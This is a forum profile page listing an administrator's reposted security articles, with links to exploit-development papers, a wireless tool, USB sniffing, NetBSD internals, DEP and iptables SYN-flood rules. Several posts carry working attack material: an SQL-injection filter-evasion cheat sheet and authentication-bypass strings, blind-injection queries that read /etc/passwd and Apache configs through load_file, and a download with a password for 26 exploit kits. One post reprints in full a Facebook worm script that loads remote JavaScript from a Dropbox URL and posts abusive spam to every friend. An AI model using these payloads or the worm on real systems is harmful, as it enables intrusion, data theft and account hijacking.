Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18713

  • Joined

  • Last visited

  • Days Won

    701

 Content Type 

Everything posted by Nytro

  1. Nytro
    Linux exploit development part 4 Authored by sickness Posted May 15, 2011 Whitepaper called Linux exploit development part 4 - ASCII armor bypass + return-to-plt. Download: http://packetstormsecurity.org/files/download/101426/lewt4-bypass.pdf http://www.exploit-db.com/download_pdf/17286
  2. Nytro
    KisMAC- Wireless Security Tool For MAC OS As discussed so many topics for both Linux and Windows operating system, now this article will talk about the Wireless LAN (WLAN) security tool that are available for MAC operating system. This article is linked with the series article of Wardriving. Wardriving a act of searching/locating and exploit a access point. If you are a close user of MAC operating system so this tool is for you, KisMAC is a free, open source wireless stumbling and security tool for Mac OS X. Kismac is a replica of netstumbler for windows and Kismet for Linux, the overall idea of wardriving is same You can get and install Kismac on your MACbook and start driving the concept of gpsd is same. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. KisMAC supports many third party USB devices: Intersil Prism2, Ralink rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is supported for scanning. Key Features Reveals hidden / cloaked / closed SSIDs Shows logged in clients (with MAC Addresses, IP addresses and signal strengths) Mapping and GPS support Can draw area maps of network coverage PCAP import and export Support for 802.11b/g Different attacks against encrypted networks Deauthentication attacks AppleScript-able Kismet drone support (capture from a Kismet drone) Cracking Support Bruteforce attacks against LEAP, WPA and WEP Weak scheduling attack against WEP Newsham 21-bit attack against WEP Download: http://kismac-ng.org/ Tutorial: http://trac.kismac-ng.org/wiki/tutorials Sursa: KisMAC- Wireless Security Tool For MAC OS | Ethical Hacking-Your Way To The World OF IT Security
  3. Nytro
    USB sniffing on linux March 18th, 2009 The linux kernel has a facility called “usbmon” which can be used to sniff the USB bus. It’s been in there for ages, and the output is really easy to collect, even from the command line shell. Simply mount debugfs and insmod the usbmon module: mount -t debugfs none_debugs /sys/kernel/debug modprobe usbmon Then you can just cat USB traffic like this: cat /sys/kernel/debug/usbmon/1u It all comes out in an ASCII dump format which is easily parsed. Every USB bus also has a device file where you can sniff the raw packets straight off the wire. More info in the usbmon documentation. But while it’s all easily parsed if you need it, there aren’t really any tools around that do it for you. That is… except for libpcap. Libpcap is the power behind the throne of the venerable tcpdump tool. Tcpdump is not much more than a command line parser and pretty-printer of various network protocols. The heavy duty lifting is done by libpcap, not least by providing a cross-platform API for sniffing devices, something that is otherwise non-standard and different on every platform. It’s great, I’ve used it before (in capstats) and it’s very easy to use. Libpcap on linux supports usbmon sniffing, which means you can use tcpdump to sniff a USB port and write this to a capture file. But best of all: wireshark, the all-singing all-dancing network analyzer that uses tcpdump capture files, has USB support as well. So this is the result: The screenshot shows a filter applied to only see device 18 on the sniffed USB bus. That’s an arduino, i.e. an FTDI USB-serial chip. The FTDI chips send status updates to the USB host system every 16ms (!). The status update consists of a two-byte message (described here). This is actually present in every packet coming in from the FTDI chip; status updates just don’t have any other data. So for a clean sniffing session from the arduino, we want to filter out any packets that are < 3 bytes in length. The end result is serial data which the arduino sent to the host system. The screenshot shows a session on my arduino shell, arsh. This is great stuff – wireshark includes a massive amount of analysis tools and lots of options for filtering and otherwise massaging your captured data. You need relatively recent versions of libpcap, tcpdump and wireshark for this. I compiled all three of these out of their respective repositories (easy compile all). On my ubuntu system, the libpcap version was particularly old. Tcpdump doesn’t have a pretty-printer for USB data yet, so you can only dump to a capture file for processing by wireshark. Sursa: bert’s blog » Blog Archive » USB sniffing on linux
  4. Nytro
    26 Underground Hacking Exploit Kits available for Download ! : The Hacker News List of Hacking Exploit Kits : Unknow Tor Target-Exploit Smart pack RDS My poly sploit multisploit mypack-009 mypack-091 mypack-086 mypack-081 Mpack Infector Ice-pack-1 Ice-pack-2 Ice-pack-3 G-pack Fire pack -1 Fire Pack -2 Fiesta -1 Fiesta -2 Cry 217 Armitage Adpack -1 Adpack -2 0x88 Download: http://www.multiupload.com/EFDCHHZ9ZD Password: thn Sursa: 26 Underground Hacking Exploit Kits available for Download ! ~ THN : The Hackers News
  5. Nytro
    Eu "sunt" din Bucuresti. O sa vin pe la 8 - 8:20 acolo. Dar nu stiu cum sa facem. Eu o sa ma intalnesc cu Cheater. Puteti veni cu tricourile "Fan RST".
  6. Nytro
    NetBSD Internals The NetBSD Developers Copyright © 2006, 2007, 2008, 2009, 2010 The NetBSD Foundation All brand and product names used in this guide are or may be trademarks or registered trademarks of their respective owners. NetBSD® is a registered trademark of The NetBSD Foundation, Inc. Published: 2010/03/06 16:30:38 $NetBSD: index.html,v 1.18 2010/04/30 16:19:12 jakllsch Exp $ Table of Contents Purpose of this book 1. Memory management 1.1. The UVM virtual memory manager 1.2. Managing wired memory 2. File system internals 2.1. vnode layer overview 2.2. VFS layer overview 2.3. File systems overview 2.4. Initialization and cleanup 2.5. Mounting and unmounting 2.6. File system statistics 2.7. vnode management 2.8. The root vnode 2.9. Path name resolution procedure 2.10. File management 2.11. Symbolic link management 2.12. Directory management 2.13. Special nodes 2.14. NFS support 2.15. Step by step file system writing 3. Processes and threads 3.1. Process startup 3.2. Traps and system calls 3.3. Processes and threads creation 3.4. Processes and threads termination 3.5. Signal delivery 3.6. Thread scheduling 4. Networking 4.1. Routing 4.2. Sockets 4.3. mbufs 4.4. IP layer 4.5. UDP 4.6. TCP 5. Networking Services 5.1. IEEE 802.11 5.2. ISDN 5.3. IPSec 5.4. Networking pseudo-devices 5.5. Packet Filters 6. Regression testing 6.1. Testing file systems A. Acknowledgments A.1. Authors A.2. License B. Bibliography Bibliography Tutorial: http://netbsd.org/docs/internals/en/index.html
  7. Nytro
    SQLi filter evasion cheat sheet (MySQL) This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years of PHPIDS filter evasion at the CONFidence 2.0 conference. You can find the slides here. For a quicker reference you can use the following cheatsheet. More detailed explaination can be found in the slides or in the talk (video should come online in a few weeks). Basic filter Comments ‘ or 1=1# ‘ or 1=1– - ‘ or 1=1/* (MySQL < 5.1) ' or 1=1;%00 ' or 1=1 union select 1,2 as ` ' or#newline 1='1 ' or– -newline 1='1 ' /*!50000or*/1='1 ' /*!or*/1='1 Prefixes + – ~ ! ‘ or –+2=- -!!!’2 Operators ^, =, !=, %, /, *, &, &&, |, ||, , >>, <=, <=, ,, XOR, DIV, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST, CAST, CONVERT, IS, IN, NOT, MATCH, AND, OR, BINARY, BETWEEN, ISNULL Whitespaces %20 %09 %0a %0b %0c %0d %a0 /**/ ‘or+(1)sounds/**/like“1“–%a0- ‘union(select(1),tabe_name,(3)from`information_schema`.`tables`)# Strings with quotes SELECT ‘a’ SELECT “a” SELECT n’a’ SELECT b’1100001? SELECT _binary’1100001? SELECT x’61? Strings without quotes ‘abc’ = 0×616263 Aliases select pass as alias from users select pass aliasalias from users select pass`alias alias`from users Typecasting ‘ or true = ’1 # or 1=1 ‘ or round(pi(),1)+true+true = version() # or 3.1+1+1 = 5.1 ‘ or ’1 # or true Compare operator typecasting select * from users where ‘a’='b’='c’ select * from users where (‘a’='b’)=’c’ select * from users where (false)=’c’ select * from users where (0)=’c’ select * from users where (0)=0 select * from users where true select * from users Authentication bypass ‘=’ select * from users where name = ”=” select * from users where false = ” select * from users where 0 = 0 select * from users where true select * from users Authentication bypass ‘-’ select * from users where name = ”-” select * from users where name = 0-0 select * from users where 0 = 0 select * from users where true select * from users Function filter General function filtering ascii (97) load_file/*foo*/(0×616263) Strings with functions ‘abc’ = unhex(616263) ‘abc’ = char(97,98,99) hex(‘a’) = 61 ascii(‘a’) = 97 ord(‘a’) = 97 ‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36)) Strings extracted from gadgets collation(\N) // binary collation(user()) // utf8_general_ci @@time_format // %H:%i:%s @@binlog_format // MIXED @@version_comment // MySQL Community Server (GPL) dayname(from_days(401)) // Monday dayname(from_days(403)) // Wednesday monthname(from_days(690)) // November monthname(from_unixtime(1)) // January collation(convert((1)using/**/koi8r)) // koi8r_general_ci (select(collation_name)from(information_schema.collations)where(id)=2) // latin2_czech_cs Special characters extracted from gadgets aes_encrypt(1,12) // 4çh±{?”^c×HéÉEa des_encrypt(1,2) // ‚GÒ/ïÖk @@ft_boolean_syntax // + -><()~*:""&| @@date_format // %Y-%m-%d @@innodb_log_group_home_dir // .\ Integer representations false: 0 true: 1 true+true: 2 floor(pi()): 3 ceil(pi()): 4 floor(version()): 5 ceil(version()): 6 ceil(pi()+pi()): 7 floor(version()+pi()): 8 floor(pi()*pi()): 9 ceil(pi()*pi()): 10 concat(true,true): 11 ceil(pi()*pi())+true: 11 ceil(pi()+pi()+version()): 12 floor(pi()*pi()+pi()): 13 ceil(pi()*pi()+pi()): 14 ceil(pi()*pi()+version()): 15 floor(pi()*version()): 16 ceil(pi()*version()): 17 ceil(pi()*version())+true: 18 floor((pi()+pi())*pi()): 19 ceil((pi()+pi())*pi()): 20 ceil(ceil(pi())*version()): 21 concat(true+true,true): 21 ceil(pi()*ceil(pi()+pi())): 22 ceil((pi()+ceil(pi()))*pi()): 23 ceil(pi())*ceil(version()): 24 floor(pi()*(version()+pi())): 25 floor(version()*version()): 26 ceil(version()*version()): 27 ceil(pi()*pi()*pi()-pi()): 28 floor(pi()*pi()*floor(pi())): 29 ceil(pi()*pi()*floor(pi())): 30 concat(floor(pi()),false): 30 floor(pi()*pi()*pi()): 31 ceil(pi()*pi()*pi()): 32 ceil(pi()*pi()*pi())+true: 33 ceil(pow(pi(),pi())-pi()): 34 ceil(pi()*pi()*pi()+pi()): 35 floor(pow(pi(),pi())): 36 @@new: 0 @@log_bin: 1 !pi(): 0 !!pi(): 1 true-~true: 3 log(-cos(pi())): 0 -cos(pi()): 1 coercibility(user()): 3 coercibility(now()): 4 minute(now()) hour(now()) day(now()) week(now()) month(now()) year(now()) quarter(now()) year(@@timestamp) crc32(true) Extract substrings substr(‘abc’,1,1) = ‘a’ substr(‘abc’ from 1 for 1) = ‘a’ substring(‘abc’,1,1) = ‘a’ substring(‘abc’ from 1 for 1) = ‘a’ mid(‘abc’,1,1) = ‘a’ mid(‘abc’ from 1 for 1) = ‘a’ lpad(‘abc’,1,space(1)) = ‘a’ rpad(‘abc’,1,space(1)) = ‘a’ left(‘abc’,1) = ‘a’ reverse(right(reverse(‘abc’),1)) = ‘a’ insert(insert(‘abc’,1,0,space(0)),2,222,space(0)) = ‘a’ space(0) = trim(version()from(version())) Search substrings locate(‘a’,'abc’) position(‘a’,'abc’) position(‘a’ IN ‘abc’) instr(‘abc’,'a’) substring_index(‘ab’,'b’,1) Cut substrings length(trim(leading ‘a’ FROM ‘abc’)) length(replace(‘abc’, ‘a’, ”)) Compare strings strcmp(‘a’,'a’) mod(‘a’,'a’) find_in_set(‘a’,'a’) field(‘a’,'a’) count(concat(‘a’,'a’)) String length length() bit_length() char_length() octet_length() bit_count() String case ucase lcase lower upper password(‘a’) != password(‘A’) old_password(‘a’) != old_password(‘A’) md5(‘a’) != md5(‘A’) sha(‘a’) != sha(‘A’) aes_encrypt(‘a’) != aes_encrypt(‘A’) des_encrypt(‘a’) != des_encrypt(‘A’) Keyword filter Connected keyword filtering (0)union(select(table_name),column_name,… 0/**/union/*!50000select*/table_name`foo`/**/… 0%a0union%a0select%09group_concat(table_name)…. 0?union all select all`table_name`foo from`information_schema`. `tables` OR, AND ‘||1=’1 ‘&&1=’1 ‘=’ ‘-’ OR, AND, UNION ‘ and (select pass from users limit 1)=’secret OR, AND, UNION, LIMIT ‘ and (select pass from users where id =1)=’a OR, AND, UNION, LIMIT, WHERE ‘ and (select pass from users group by id having id = 1)=’a OR, AND, UNION, LIMIT, WHERE, GROUP ‘ and length((select pass from users having substr(pass,1,1)=’a')) OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING ‘ and (select substr(group_concat(pass),1,1) from users)=’a ‘ and substr((select max(pass) from users),1,1)=’a ‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT ‘ and substr(load_file(‘file’),locate(‘DocumentRoot’,(load_file(‘file’)))+length(‘DocumentRoot’),10)=’a ‘=” into outfile ‘/var/www/dump.txt OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE ‘ procedure analyse()# ‘-if(name=’Admin’,1,0)# ‘-if(if(name=’Admin’,1,0),if(substr(pass,1,1)=’a',1,0),0)# Control flow case ‘a’ when ‘a’ then 1 [else 0] end case when ‘a’='a’ then 1 [else 0] end if(‘a’='a’,1,0) ifnull(nullif(‘a’,'a’),1) If you have any other useful tricks I forgot to list here please leave a comment. Sursa: SQLi filter evasion cheat sheet (MySQL) « Reiners’ Weblog
  8. Nytro
    MySQL Authentication Bypass I used this trick already to circumvent the PHPIDS filters in some earlier versions and mentioned it shortly in my article about MySQL Syntax. However when I used the same trick to circumvent the GreenSQL database firewall I noticed that this MySQL “bug” is not well known and so I decided to shortly write about it. Take a look at the following unsecure SQL query: SELECT * FROM table WHERE username = ‘$username‘ and password = ‘$password‘ Everyone knows about the simple authentication bypass using ‘ OR 1=1/* as username or perhaps ‘ OR 1=’1 for both inputs. But what MySQL allows too is a direct comparisons of 2 strings: SELECT * FROM table WHERE username = ‘string’='string‘ and password = ‘string’='string‘ Therefore you dont need any Operators like “OR” which are mostly detected by filters. To shorten your vector you can also use an emtpy string, narrowing your SQL injection to: username: ‘=’ password: ‘=’ Which ends in: SELECT * FROM table WHERE username = ‘‘=’‘ and password = ‘‘=’‘ and successfully bypasses authentication on MySQL. Of course you can use other operators then “equal” and use whitespaces and prefixes to build more complex vectors to circumvent filters. Please refer to the MySQL syntax article. I have also tested this behavior on MSSQL, PostgreSQL and Oracle which does not have the same behavior. What MySQL seems to allow is a triple comparison in a WHERE clause. That means you can use: SELECT * FROM users WHERE 1=1=1 SELECT * FROM users WHERE ‘a’='a’='a’ Interestingly the following queries also work: SELECT * FROM users WHERE ‘a’='b’='c’ SELECT * FROM users WHERE column=’b'=’c’ SELECT * FROM users WHERE column=column=1 That means if you compare strings it doesnt matter if they are equal and it seems like if you compare columns with Strings or Integers they will get typecasted. Lastly I would like to recommend a great article from Stefan Esser about another authentication bypass on MySQL. Updated: MySQL does not consider this as a bug. Please refer to the bugreport for detailed information. Again this shows how flexible the MySQL syntax is (intentionally). Sursa: MySQL Authentication Bypass « Reiners’ Weblog
  9. Nytro
    Blind SQL injection with load_file() Currently I am working a lot on RIPS but here is a small blogpost about a technique I thought about lately and wanted to share. While participating at the smpCTF I came across a blind SQL injection in level 2. After solving the challenge I checked for the FILE privilege: /level2/?id=1/**/and/**/(SELECT/**/is_grantable/**/FROM/**/information_schema.user_privileges/**/WHERE/**/privilege_type=0x66696C65/**/AND/**/grantee/**/like/**/0x25726F6F7425/**/limit/**/1)=0x59 Luckily the FILE privilege was granted which was not intended by the organizer. Since I had not solved level 1 at that time I thought it would be easier to read the PHP files to solve level 1. First I checked if reading files with load_file() worked at all and tried to read /etc/passwd: /level2/?id=1/**/and/**/!isnull(load_file(2F6574632F706173737764)) Since the webpage with id=1 was displayed the and condition must have been evaluated to true which means that the file could be read (load_file() returns null if the file can not be read). Before reading the PHP files I needed to find the webserver configuration file to find out where the DocumentRoot was configured. I used the same query as above to check for the existence of the following apache config files: $paths = array( "/etc/passwd", "/etc/init.d/apache/httpd.conf", "/etc/init.d/apache2/httpd.conf", "/etc/httpd/httpd.conf", "/etc/httpd/conf/httpd.conf", "/etc/apache/apache.conf", "/etc/apache/httpd.conf", "/etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/local/apache2/conf/httpd.conf", "/usr/local/apache/conf/httpd.conf", "/opt/apache/conf/httpd.conf", "/home/apache/httpd.conf", "/home/apache/conf/httpd.conf", "/etc/apache2/sites-available/default", "/etc/apache2/vhosts.d/default_vhost.include"); Update: There is an official list for Apache. Very useful. Webpage with id=1 was displayed for the file /etc/httpd/httpd.conf thus revealing that this file existed and could be read. Now it was time for the tricky part: I had only a true/false blind SQL injection which means that I could only bruteforce the configuration file char by char. Since the length of the file was more than 10000 chars this would have taken way too long. I decided to give little shots at the configuration file trying to hit the DocumentRoot setting or a comment nearby that identifies my current position. Each shot bruteforced 10 alphanumerical characters: /level2/?id=1/**/and/**/mid(lower(load_file(0x2F6574632F68747470642F68747470642E636F6E66)),$k,1)=0x$char I compared the few bruteforced characters to a known apache configuration file trying to map the characters to a common configuration comment. This worked for most of the character sequences but unfortunately almost every configuration file is a bit different so that it was not possible to calculate the correct offset of the DocumentRoot setting once another setting had been identified. I bruteforced only alphanumerical strings to save time. For example the bruteforced string “dulesthoselisted” could be mapped to the comment “modules (those listed by `httpd -l’)” and so on. After the 10th shot I luckily hit the DocumentRoot setting comment at offset 7467 and after this it was possible to calculate the correct offset for the beginning of the DocumentRoot setting and I could retrieve “srvhttpdhtdocs” (DocumentRoot: /srv/httpd/htdocs/). While that worked fine during the hectics of the CTF and was better than a bruteforce on the whole configuration file, I thought about it again yesterday and thought that this technique was plain stupid . If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with LOCATE(substr,str[,pos]) which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the DocumentRoot setting: substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10) and can then be bruteforced easily: mid(lower(substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+length('DocumentRoot'),10)),$k,1)=0x$char No magic here, but a helpful combination of mysql build in functions when reading files blindly. Sursa: Blind SQL injection with load_file() « Reiners’ Weblog
  10. Nytro
    Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS May 13th, 2011 By Josh Constine Facebook has released several new security features designed to thwart unauthorized logins, cross-site scripting, and clickjacking that trick users into sharing spam to the news feed. Login approvals require suspicious logins to be confirmed with a code texted to a user’s phone, while self-XSS and clickjacking protection warns users and requires them to confirm their actions when pasting links into their browser or clicking suspicious Like buttons. These protections should reduce the prevalence of hijacked accounts and highly visible spam in the news feed that perpetuate the public perception of Facebook as less safe than the rest of the internet. Facebook’s latest internal security efforts were announced alongside a new partnership with Web of Trust, a a crowd-sourced website reputation rating service that will be used to power alerts to Facebook users when they click malicious outbound links. Facebook has previously concentrated on improving security through user education and login protection features such as remote session logout and one-time passwords. Login Approvals Now Facebook is rolling out the two-factor authentication it announced last month. Users can visit Account -> Account Settings -> Settings -> Account Security to enable the feature, which will require them to verify their phone number. Once enabled, any time someone attempts to login to the account through a new or unrecognized device, they’ll have to enter a code sent to their phone via SMS. Users will also be notified the next time the successfully login of any suspicious attempts thwarted by the login approvals feature. Users could be temporarily locked out of their account if they have Login Approvals in the unlikely event that both their phone and their approved Facebook login device were lost or stolen. Still, the feature offers a strong additional layer of security for those who opt in to it. It can also serve to protect users who may share their password with a loved one for use on their regular login device, but who don’t want those people to access their account from elsewhere. Clickjacking Protection Clickjacking refers to when a malicious website conceals an active link beneath an image or other disguise to fool a user into clicking a link they didn’t intend to. In the case of Facebook, malicious sites sometimes conceal Like buttons beneath video players or appealing offers, leading users to inadvertently share the spam site to the news feed, drawing in more users to the scam. Facebook already has automated systems designed to identify and disable uses of the Like button for clickjack, as well as block or remove outbound links to clickjacking sites. Now Facebook as added additional protection against the tactic by requiring users to confirm they wanted to click a Like button that is suspected to be part of a clickjacking scheme. The Like won’t go through and stories won’t be published to the news feed unless the user confirms. This feature could cut down on one of the most prominent Facebook security threats as of late, which has spread through links that promise videos of racy or gruesome content. Self-XSS Protection Self-cross site scripting is a security threat in which a spam news feed story, wall posts, or Message asks users to copy malicious code into their browser, thereby causing a hacker’s message to be posted to additional friends. These threats are becoming increasingly sophisticated over the years (if you want to get deeper into the topic, be sure to check out security researcher Joey Tyson’s Social Hacking blog). The new security features detects when users attempt to paste malicious code into their browser, displays an alert explaining why the practice of copying code into a browser is dangerous, and prevents the code from being run. By mixing education in with technical security features, Facebook can protect users now and teach them to protect themselves in the future. Sursa: Facebook Rolls Out Login Approvals and Security Protections Against Clickjacking and Self-XSS
  11. Nytro
    Optimized Blind MySQL Injection Data Retrieval Posted on March 31, 2011 by Roberto Salgado I recently came across a paper titled Faster Blind MySQL Injection Using Bit Shifting by Jelmer de Hen describing a technique that allows the retrieval of data from a MySQL database in only 8 requests per character using bit shifting; this is a slight improvement from the traditional Bisection method. This got me thinking on how information could be extracted from the database in even less amount of requests and after a few hours of fooling around, this is what I came up with. AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), 'a,b,c,d,e,f ,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#, $,%,^,&,*,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ,')),1,1) FROM in formation_schema.tables LIMIT 1)=@a AND IF(@a!='',@a,SLEEP(5)); A quick explanation of how this query works and what it does: It starts off with your basic blind injection, selecting only 1 character at a time from the table SELECT MID(table_name,1,1) FROM information_schema.tables LIMIT 1 It then uses FIND_IN_SET(), to look for the position of the extracted character in the list. So for example, say the table is CHARACTER_SET, MID("CHARACTER_SET",1,1) = 'C', therefore the returned value for FIND_IN_SET('C', 'a,b,c') would be 3 (case insensitive). We then proceed to use BIN() to convert it to binary, BIN(3) = 11. Now that we've reduced the character to two possibilities, 1 or 0, we only have to check if the result is 1, if not we can assume it's 0. So BIN(3) = 11 would take 3 requests: Is the first digit 1? Yes. Is the second digit 1? Yes. Is the third digit 1? No, there is no third digit, so it triggers the SLEEP() function. Now we know that CAST(b'11' AS DEC) is 3 and that's the equivalent of 'c' on the list, all in 3 requests! Say your list contained 45 elements, BIN(45) = 101101, still only making the total amount of requests 7 for characters in later position on the list. I'm sure this could be optimized and greatly improved, possibly by removing the need for FIND_IN_SET() and using a more effective function. One idea would be to split the list in two requests, this way you can ensure the length of the binary doesn't grow too big. Downside: Query can be a bit longer than normal. Requires SLEEP() to know when you've reached the end of the binary. Another possible solution that doesn't require SLEEP(), but would require two different pages (test.php?id=0, test.php?id=1) could be done with something like this: IF((@a:=MID(BIN(FIND_IN_SET(MID((SELECT table_name FROM info rmation_schema.tables LIMIT 1),1,1),'a,b,c,d,e,f,g,h,i,j,k,l, m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,$,%,^,&, *,(,),-,+,=,\,,.,",\',~,`,\\,|,{,},[,],:,;, ')),1,1))!='',@a,0/0); UPDATE: Two things I just thought I should point out: This technique doesn't necessarily require FIND_IN_SET(). There are plenty of other similar functions that could be substituted in its place (locate, position, instr, field) just to name a few. Secondly, the use of quotations can be avoided. For example, FIND_IN_SET(0x33, CONCAT_WS(0x2C,0x31,0x32,0x33)); Sursa: Optimized Blind MySQL Injection Data Retrieval
  12. Nytro
    Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks by LinuxTitli on June 26, 2005 A SYN flood is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system. This is a well known type of attack and is generally not effective against modern networks. It works if a server allocates resources after receiving a SYN, but before it has received the ACK. if Half-open connections bind resources on the server, it may be possible to take up all these resources by flooding the server with SYN messages. Syn flood is common attack and it can be block with following iptables rules: iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN All incoming connection are allowed till limit is reached: --limit 1/s: Maximum average matching rate in seconds --limit-burst 3: Maximum initial number of packets to match Open our iptables script, add the rules as follows: # Limit the number of incoming tcp connections # Interface 0 incoming syn-flood protection iptables -N syn_flood iptables -A INPUT -p tcp --syn -j syn_flood iptables -A syn_flood -m limit --limit 1/s --limit-burst 3 -j RETURN iptables -A syn_flood -j DROP #Limiting the incoming icmp ping request: iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j ACCEPT iptables -A INPUT -p icmp -m limit --limit 1/s --limit-burst 1 -j LOG --log-prefix PING-DROP: iptables -A INPUT -p icmp -j DROP iptables -A OUTPUT -p icmp -j ACCEPT First rule will accept ping connections to 1 per second, with an initial burst of 1. If this level crossed it will log the packet with PING-DROP in /var/log/message file. Third rule will drop packet if it tries to cross this limit. Fourth and final rule will allow you to use the continue established ping request of existing connection. Where, ??limit rate: Maximum average matching rate: specified as a number, with an optional ‘/second’, ‘/minute’, ‘/hour’, or ‘/day’ suffix; the default is 3/hour. ??limit?burst number: Maximum initial number of packets to match: this number gets recharged by one every time the limit specified above is not reached, up to this number; the default is 5. You need to adjust the –limit-rate and –limit-burst according to your network traffic and requirements. Let us assume that you need to limit incoming connection to ssh server (port 22) no more than 10 connections in a 10 minute: iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP --sport 513:65535 --dport 22 -m state --state NEW,ESTABLISHED -m recent --set -j ACCEPT iptables -I INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 600 --hitcount 11 -j DROP iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 --sport 22 --dport 513:65535 -m state --state ESTABLISHED -j ACCEPT Sursa: Linux Iptables Limit the number of incoming tcp connection / syn-flood attacks
  13. Nytro
    Nu l-am testat, nu ma pasioneaza astfel de lucruri. Aveti grija, e posibil sa fie fisiere infectate.
  14. Nytro
    Data Execution Prevention (DEP) Systems and Network Analysis Center Information Assurance Directorate Computer attackers commonly use buffer overflow exploits to gain access to computer systems. Many of these malicious code exploits can be prevented with Data Execution Prevention (DEP), a security feature available in modern operating systems. DEP provides protection for all memory that is not specifically marked as executable code. This guide discusses how to configure and enable DEP. Download: http://www.nsa.gov/ia/_files/factsheets/I733-TR-043R-2007.pdf
  15. Nytro
    Da, e interesanta ideea. Dar proiectul in sine ar fi destul de complicat. Trebuie selectate elegant calculatoarele care vor crackui md5-urile (initial ar fi de ajuns), trebuie luate in considerare toate posibilitatile: daca un calculator trebuie sa faca 1.000.000 de incercari si face decat una? Daca se intrerupe conexiunea apoi revine? Ar fi ceva de munca.
  16. Nytro
    Script that gives hackers access to user accounts floods Facebook A widespread hack spread across Facebook early Thursday morning and shows no signs of abating as of yet. It comes in the form of a script that posts heavily profanity-laden wall posts continuously, instructing you that the only way to remove the posts is to click a ‘Remove This App’ link. Unfortunately the link is a hoax and allows the malicious script to access your Facebook account. Your account will then continue to spread the script in the form of similarly formatted wall posts on your friends accounts. The message uses the phrase ‘Vote for Nicole Santos’, leading some to believe that it is a high school prank related to Prom season. Here is a link (Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below. - Pastebin.com) to the raw code of the script causing the problems on Facebook. If any of you commenters have any suggestions as to how this might have been injected in the first place please do let us know. Script: var message = "Fuck you faggot. Go kill yourself. Vote for Nicole Santos. I hate you and the only way to remove all these posts is by disabling this below."; var jsText = "javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();"; var myText = "Remove This App"; var post_form_id = document.getElementsByName('post_form_id')[0].value; var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false); gf.send(); if(gf.readyState!=4){ }else{ data = eval('(' + gf.responseText.substr(9) + ')'); if(data.error){ }else{ friends = data.payload.entries.sort(function(a,{return a.index-b.index;}); } } for(var i=0; i<friends.length; i++){ var httpwp = new XMLHttpRequest(); var urlwp = "http://www.facebook.com/fbml/ajax/prompt_feed.php?__a=1"; var paramswp = "&__d=1&app_id=6628568379&extern=0&" + "&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) + "&feed_info[action_links][0][text]=" + encodeURIComponent(myText) + "&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid + "&user_message=" + message; httpwp.open("POST", urlwp, true); httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); httpwp.setRequestHeader("Content-length", paramswp.length); httpwp.setRequestHeader("Connection", "keep-alive"); httpwp.onreadystatechange = function(){ if (httpwp.readyState == 4 && httpwp.status == 200){ } } httpwp.send(paramswp); } alert("Failed to remove. Go fuck yourself with a cactus."); document.location = "profile.php?id=100000583908715"; Unsurprisingly many are trying to trace the source back to the ‘Nicole Santos’ that may have originated it, although it’s unclear whether this person would be the originator or just a victim of the hack. As of now the only solution seems to be not to click on the link or any link requiring that you ‘Verify you account to prevent spam’ as this may be how the hack gains access to your Facebook wall in the first place. Simply block the friend sending it to you as their account is now compromised. Once the problem has been fixed by Facebook you can re-enable them. We will continue to update you on the hack and it’s effects, check back with this post for more information Sursa: Script that gives hackers access to user accounts floods Facebook ! ~ THN : The Hackers News
  17. Nytro
